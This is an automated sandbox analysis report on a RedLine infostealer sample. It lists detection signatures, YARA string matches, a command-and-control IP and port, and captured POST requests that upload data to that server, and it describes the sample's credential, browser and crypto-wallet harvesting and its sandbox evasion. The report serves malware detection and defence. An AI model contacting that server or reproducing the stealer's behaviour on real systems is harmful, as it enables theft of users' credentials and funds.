Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DBAcglWJwi.exe

Overview

General Information

Sample Name:DBAcglWJwi.exe
Analysis ID:660832
MD5:0b17057228d36c548c8c90297a81bf75
SHA1:51605a0779d86d4c366f57bc09bf0d876cf0c029
SHA256:e9d0051a518d260fa503b82b6d4be8535a0bad93f2e69b2b75a6f78e44a7eb82
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Contains functionality to detect virtual machines (STR)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • DBAcglWJwi.exe (PID: 6196 cmdline: "C:\Users\user\Desktop\DBAcglWJwi.exe" MD5: 0B17057228D36C548C8C90297A81BF75)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
DBAcglWJwi.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    DBAcglWJwi.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      DBAcglWJwi.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        DBAcglWJwi.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1048a:$u7: RunPE
        • 0x13b41:$u8: DownloadAndEx
        • 0x9130:$pat14: , CommandLine:
        • 0x13079:$v2_1: ListOfProcesses
        • 0x1068b:$v2_2: get_ScanVPN
        • 0x1072e:$v2_2: get_ScanFTP
        • 0x1141e:$v2_2: get_ScanDiscord
        • 0x1240c:$v2_2: get_ScanSteam
        • 0x12428:$v2_2: get_ScanTelegram
        • 0x124ce:$v2_2: get_ScanScreen
        • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
        • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
        • 0x13509:$v2_2: get_ScanBrowsers
        • 0x135ca:$v2_2: get_ScannedWallets
        • 0x135f0:$v2_2: get_ScanWallets
        • 0x13610:$v2_3: GetArguments
        • 0x11cd9:$v2_4: VerifyUpdate
        • 0x165e6:$v2_4: VerifyUpdate
        • 0x139ca:$v2_5: VerifyScanRequest
        • 0x130c6:$v2_6: GetUpdates
        • 0x165c7:$v2_6: GetUpdates

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    00000000.00000000.439615387.0000000000362000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 2 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.0.DBAcglWJwi.exe.360000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        0.0.DBAcglWJwi.exe.360000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                          0.0.DBAcglWJwi.exe.360000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                            0.0.DBAcglWJwi.exe.360000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                            • 0x1048a:$u7: RunPE
                            • 0x13b41:$u8: DownloadAndEx
                            • 0x9130:$pat14: , CommandLine:
                            • 0x13079:$v2_1: ListOfProcesses
                            • 0x1068b:$v2_2: get_ScanVPN
                            • 0x1072e:$v2_2: get_ScanFTP
                            • 0x1141e:$v2_2: get_ScanDiscord
                            • 0x1240c:$v2_2: get_ScanSteam
                            • 0x12428:$v2_2: get_ScanTelegram
                            • 0x124ce:$v2_2: get_ScanScreen
                            • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                            • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                            • 0x13509:$v2_2: get_ScanBrowsers
                            • 0x135ca:$v2_2: get_ScannedWallets
                            • 0x135f0:$v2_2: get_ScanWallets
                            • 0x13610:$v2_3: GetArguments
                            • 0x11cd9:$v2_4: VerifyUpdate
                            • 0x165e6:$v2_4: VerifyUpdate
                            • 0x139ca:$v2_5: VerifyScanRequest
                            • 0x130c6:$v2_6: GetUpdates
                            • 0x165c7:$v2_6: GetUpdates
                            0.2.DBAcglWJwi.exe.360000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                              Click to see the 3 entries

                              Sigma Signatures

                              No Sigma rule has matched

                              Snort Signatures

                              No Snort rule has matched

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Multi AV Scanner detection for submitted file
                              Source: DBAcglWJwi.exeVirustotal: Detection: 73%Perma Link
                              Source: DBAcglWJwi.exeReversingLabs: Detection: 75%
                              Antivirus / Scanner detection for submitted sample
                              Source: DBAcglWJwi.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://185.222.58.90:17910/Avira URL Cloud: Label: malware
                              Source: http://185.222.58.90:17910Avira URL Cloud: Label: malware
                              Source: 0.0.DBAcglWJwi.exe.360000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}
                              Source: DBAcglWJwi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: DBAcglWJwi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                              Networking

                              barindex
                              Uses known network protocols on non-standard ports
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 17910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Source: unknownNetwork traffic detected: HTTP traffic on port 17910 -> 49837
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: DBAcglWJwi.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPE
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.90:17910Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.90:17910Content-Length: 1146787Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.90:17910Content-Length: 1146779Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: Joe Sandbox ViewIP Address: 185.222.58.90 185.222.58.90
                              Source: global trafficTCP traffic: 192.168.2.5:49761 -> 185.222.58.90:17910
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.90
                              Source: DBAcglWJwi.exe, 00000000.00000002.567244798.0000000002866000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.90:17910/
                              Source: DBAcglWJwi.exe, 00000000.00000003.514842393.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.564264469.0000000000A6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                              Source: DBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/1
                              Source: DBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                              Source: DBAcglWJwi.exe, 00000000.00000003.562609335.0000000008591000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562398322.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.562200339.0000000008590000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000003.526220731.0000000008581000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cobj
                              Source: DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                              Source: DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                              Source: DBAcglWJwi.exe, 00000000.00000002.567244798.0000000002866000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                              Source: DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmenter
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                              Source: DBAcglWJwi.exe, 00000000.00000002.566338416.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                              Source: DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                              Source: DBAcglWJwi.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
                              Source: DBAcglWJwi.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                              Source: DBAcglWJwi.exe, 00000000.00000002.566530669.00000000026EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb4VlH
                              Source: DBAcglWJwi.exeString found in binary or memory: https://api.ipify.orgcookies//setti
                              Source: DBAcglWJwi.exeString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: DBAcglWJwi.exeString found in binary or memory: https://ipinfo.io/ip%appdata%
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: DBAcglWJwi.exe, 00000000.00000002.567717089.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, DBAcglWJwi.exe, 00000000.00000002.568801169.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, tmp68C9.tmp.0.dr, tmp6316.tmp.0.dr, tmp65A9.tmp.0.dr, tmp621B.tmp.0.dr, tmp679F.tmp.0.dr, tmp6411.tmp.0.dr, tmp8BB2.tmp.0.dr, tmpA614.tmp.0.dr, tmp66D3.tmp.0.dr, tmp6AEE.tmp.0.dr, tmp6A32.tmp.0.dr, tmp64DD.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                              Source: unknownDNS traffic detected: queries for: api.ip.sb
                              Source: DBAcglWJwi.exe, 00000000.00000002.564206391.0000000000A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: DBAcglWJwi.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                              Source: DBAcglWJwi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: DBAcglWJwi.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 0.0.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: 0.2.DBAcglWJwi.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CDDE100_2_00CDDE10
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeCode function: 0_2_00CDD2F00_2_00CDD2F0
                              Source: DBAcglWJwi.exeBinary or memory string: OriginalFilename vs DBAcglWJwi.exe
                              Source: DBAcglWJwi.exe, 00000000.00000002.563277985.0000000000362000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs DBAcglWJwi.exe
                              Source: DBAcglWJwi.exe, 00000000.00000002.564206391.0000000000A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DBAcglWJwi.exe
                              Source: DBAcglWJwi.exe, 00000000.00000002.566710368.0000000002733000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DBAcglWJwi.exe
                              Source: DBAcglWJwi.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs DBAcglWJwi.exe
                              Source: DBAcglWJwi.exeVirustotal: Detection: 73%
                              Source: DBAcglWJwi.exeReversingLabs: Detection: 75%
                              Source: DBAcglWJwi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\Users\user\Desktop\DBAcglWJwi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\DBAcglWJwi.exe "C:\Users\user\Desktop\DBAcglWJwi.exe"
